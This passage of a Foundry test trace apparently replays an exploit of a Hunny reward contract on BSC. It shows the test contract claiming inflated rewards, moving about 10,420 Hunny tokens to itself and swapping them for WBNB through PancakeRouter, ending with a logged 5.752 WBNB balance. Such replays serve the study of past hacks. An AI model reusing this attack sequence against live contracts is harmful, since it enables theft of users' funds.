    │   │   │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0x000000000000000000000000000000000000000000000054bbad882a49d71f40 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ emit Staked(param0: 0xe5F7E3DD9A5612EcCb228392F47b7Ddba8cE4F1a, param1: 1563050117162874642240 [1.563e21])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 13: 0x0000000000000000000000000000000000000000000315537ad59c22f3d117fa → 0x0000000000000000000000000000000000000000000315a83683244d3da8373a
    │   │   │   │   @ 0x502486426d4271c93eebf1992240adc0aead70b19aff105753788ab374ce4932: 0x000000000000000000000000000000000000000000001650669a02374fd3bd42 → 0x0000000000000000000000000000000000000000000016a522478a6199aadc82
    │   │   │   │   @ 0x3b12465d5b39b39d9b6261c70b13e52861571a43089466522b782319c38489a1: 0x0000000000000000000000000000000000000000000000000000e8ea85db883d → 0x0000000000000000000000000000000000000000000000000000e8ec9a579fa9
    │   │   │   │   @ 0x0a6e171666ccf2976f27c8dd6665e79bf7673af450826b201a230602701e5527: 0x00000000000000000000000000000000000000000000000001e5dbcb6d1c130e → 0x00000000000000000000000000000000000000000000000001e933f9c7d18615
    │   │   │   └─ ← [Stop]
    │   │   ├─ [10474] 0x75b4b40Fe2A39287433d3C1b3f62A30e37beDDdA::update()
    │   │   │   ├─ [394] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::price0CumulativeLast() [staticcall]
    │   │   │   │   └─ ← [Return] 594597466749802105709067759973479518 [5.945e35]
    │   │   │   ├─ [416] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::price1CumulativeLast() [staticcall]
    │   │   │   │   └─ ← [Return] 1452931472230382112459038727994510580938743 [1.452e42]
    │   │   │   ├─ [893] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 4007269601943522209004015 [4.007e24], 1766787366751444498357 [1.766e21], 1622687086 [1.622e9]
    │   │   │   └─ ← [Stop]
    │   │   ├─  storage changes:
    │   │   │   @ 0x17239108d5f646f045d6f80a9d28e8ca393e20b435a2a83b607e84361b201bb2: 0 → 0x0000000000000000000000000000000000000000000000afa108c68ec4d54114
    │   │   │   @ 0x689efb69e8e429d4b4a0a9f01d92e9cdded8279d7617e5f0ea9f6f31f6304e33: 0 → 0x000000000000000000000000000000000000000000000234e32f8bc496ef7b00
    │   │   │   @ 14: 0x0000000000000000000000000000000000000000000000000000000000797ee0 → 0x0000000000000000000000000000000000000000000000000000000000797ee2
    │   │   │   @ 12: 0 → 1
    │   │   │   @ 0x6a90c3a371e140a6739444228ab687463ec32b9b1d455a969be03b4ea7c95a06: 0x00000000000000000000000000000000000000000000094c067e232c1b64421a → 0x00000000000000000000000000000000000000000000094fafd53abe0343ad76
    │   │   │   @ 0xdf9c3ba0983d3a6a3c7367f2fe10b1377a00098b5a2de255ca1c3372e1eac368: 0x00000000000000000000000000000000000000000000000000089a180032e040 → 0x00000000000000000000000000000000000000000000000013db4c57e53f28fd
    │   │   │   @ 0xdf45ddc70d62cb4b58c4ed53f8879b7041093f770b0a37aa2de90f632ca6586e: 0 → 0x000000000000000000000000000000000000000000000054bbad882a49d71f40
    │   │   └─ ← [Stop]
    │   ├─ [8083] 0x0E09FaBB73Bd3Ade0a17ECC321fD13a19e81cE82::transfer(0x515Fb5a7032CdD688B292086cf23280bEb9E31B6, 950594120 [9.505e8])
    │   │   ├─ emit Transfer(from: 0x12180BB36DdBce325b3be0c087d61Fce39b8f5A4, to: 0x515Fb5a7032CdD688B292086cf23280bEb9E31B6, value: 950594120 [9.505e8])
    │   │   ├─  storage changes:
    │   │   │   @ 0xc0a343b72aa1eb9f58369254c3281e096ca74e855aa9846c3752e22ac3831474: 0x0000000000000000000000000000000000000000000000000000000038a8ea48 → 0
    │   │   │   @ 0x689efb69e8e429d4b4a0a9f01d92e9cdded8279d7617e5f0ea9f6f31f6304e33: 0x0000000000000000000000000000000000000000000000000000001b39129d05 → 0x0000000000000000000000000000000000000000000000000000001b71bb874d
    │   │   └─ ← [Return] true
    │   ├─ emit RewardPaid(param0: 0x515Fb5a7032CdD688B292086cf23280bEb9E31B6, param1: 950594120 [9.505e8])
    │   ├─  storage changes:
    │   │   @ 9: 0x0000000000000000000000000000000000000000000000000000000060b83d68 → 0x0000000000000000000000000000000000000000000000000000000060b83d6e
    │   │   @ 0x2336a3834fd3c758ccc4180d8077084147ef1a6dbcef051f84513309aff55229: 0x000000000000000000000000000000000000000000000000002257a6d983dfcb → 0x0000000000000000000000000000000000000000000000000022586b1a8b6e28
    │   │   @ 0xe270c383ad7bc85335d49ae216d2f23be0710f4ceb8cd3d520badf2ed72b0301: 0x000000000000000000000000000000000000000000000000e4f462439f9ad79f → 0x000000000000000000000000000000000000000000000000e4f464a36b7d957b
    │   │   @ 10: 0x000000000000000000000000000000000000000000000000002257a6d983dfcb → 0x0000000000000000000000000000000000000000000000000022586b1a8b6e28
    │   └─ ← [Stop]
    ├─ [686] 0x565b72163f17849832A692A3c5928cc502f46D69::balanceOf(0x515Fb5a7032CdD688B292086cf23280bEb9E31B6) [staticcall]
    │   └─ ← [Return] 10420334114419164281600 [1.042e22]
    ├─ [29183] 0x565b72163f17849832A692A3c5928cc502f46D69::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10420334114419164281600 [1.042e22])
    │   ├─ emit Transfer(from: 0x515Fb5a7032CdD688B292086cf23280bEb9E31B6, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10420334114419164281600 [1.042e22])
    │   ├─  storage changes:
    │   │   @ 0x689efb69e8e429d4b4a0a9f01d92e9cdded8279d7617e5f0ea9f6f31f6304e33: 0x000000000000000000000000000000000000000000000234e32f8bc496ef7b00 → 0
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000234e32f8bc496ef7b00
    │   └─ ← [Return] true
    ├─ [686] 0x565b72163f17849832A692A3c5928cc502f46D69::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10420334114419164281600 [1.042e22]
    ├─ emit log_named_decimal_uint(key: "Hunny Balance", val: 10420334114419164281600 [1.042e22], decimals: 18)
    ├─ [0] VM::stopPrank()
    │   └─ ← [Return]
    ├─ [686] 0x565b72163f17849832A692A3c5928cc502f46D69::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10420334114419164281600 [1.042e22]
    ├─ [80346] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForETH(10420334114419164281600 [1.042e22], 0, [0x565b72163f17849832A692A3c5928cc502f46D69, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1622687089 [1.622e9])
    │   ├─ [893] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::getReserves() [staticcall]
    │   │   └─ ← [Return] 4007269601943522209004015 [4.007e24], 1766787366751444498357 [1.766e21], 1622687086 [1.622e9]
    │   ├─ [15600] 0x565b72163f17849832A692A3c5928cc502f46D69::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x36118142F8C21a1F3fd806D4A34F56f51F33504F, 10420334114419164281600 [1.042e22])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x36118142F8C21a1F3fd806D4A34F56f51F33504F, value: 10420334114419164281600 [1.042e22])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564029037249893493965358335 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffdcb1cd0743b691084ff
    │   │   │   @ 0xc71980c54edc906eb6d961b50cb2e262dff1c9e4dc52cfb5b2725fd18820576c: 0x00000000000000000000000000000000000000000003509285397758369179ef → 0x0000000000000000000000000000000000000000000352c76869031ccd80f4ef
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000234e32f8bc496ef7b00 → 0
    │   │   └─ ← [Return] true
    │   ├─ [38410] 0x36118142F8C21a1F3fd806D4A34F56f51F33504F::swap(0, 4570936969504711308 [4.57e18], 0x10ED43C718714eb63d5aA57B78B54704E256024E, 0x)
    │   │   ├─ [23162] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x10ED43C718714eb63d5aA57B78B54704E256024E, 4570936969504711308 [4.57e18])
    │   │   │   ├─ emit Transfer(from: 0x36118142F8C21a1F3fd806D4A34F56f51F33504F, to: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 4570936969504711308 [4.57e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x0000000000000000000000000000000000000000000000003f6f3af4b607628c
    │   │   │   │   @ 0x02b45a8bf93f5a6397b6d893a902cdbefc307f15b8d8dd07979cd7acbc0689a9: 0x00000000000000000000000000000000000000000000005fc719a53843a577b5 → 0x00000000000000000000000000000000000000000000005f87aa6a438d9e1529
    │   │   │   └─ ← [Return] true
    │   │   ├─ [686] 0x565b72163f17849832A692A3c5928cc502f46D69::balanceOf(0x36118142F8C21a1F3fd806D4A34F56f51F33504F) [staticcall]
    │   │   │   └─ ← [Return] 4017689936057941373285615 [4.017e24]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x36118142F8C21a1F3fd806D4A34F56f51F33504F) [staticcall]
    │   │   │   └─ ← [Return] 1762216429781939787049 [1.762e21]
    │   │   ├─ emit Sync(reserve0: 4017689936057941373285615 [4.017e24], reserve1: 1762216429781939787049 [1.762e21])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 10420334114419164281600 [1.042e22], amount1In: 0, amount0Out: 0, amount1Out: 4570936969504711308 [4.57e18], to: 0x10ED43C718714eb63d5aA57B78B54704E256024E)
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x60b83d6e00000000005fc719a53843a577b500000003509285397758369179ef → 0x60b83d6e00000000005f87aa6a438d9e15290000000352c76869031ccd80f4ef
    │   │   └─ ← [Stop]
    │   ├─ [9223] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(4570936969504711308 [4.57e18])
    │   │   ├─ [83] 0x10ED43C718714eb63d5aA57B78B54704E256024E::fallback{value: 4570936969504711308}()
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit Withdrawal(src: 0x10ED43C718714eb63d5aA57B78B54704E256024E, wad: 4570936969504711308 [4.57e18])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x0000000000000000000000000000000000000000000000003f6f3af4b607628c → 0
    │   │   └─ ← [Stop]
    │   ├─ [55] ContractTest::receive{value: 4570936969504711308}()
    │   │   └─ ← [Stop]
    │   └─ ← [Return] [10420334114419164281600 [1.042e22], 4570936969504711308 [4.57e18]]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 5752000000000000000 [5.752e18]
    ├─ emit log_named_decimal_uint(key: "Swap WBNB, WBEB Balance", val: 5752000000000000000 [5.752e18], decimals: 18)
    ├─  storage changes:
    │   @ 12: 0 → 1
    │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000234e32f8bc496ef7b00
    │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x0000000000000000000000000000000000000000000000004fd335864c0c0000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 58.04s (52.13s CPU time)

Ran 2 test suites in 58.96s (59.07s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
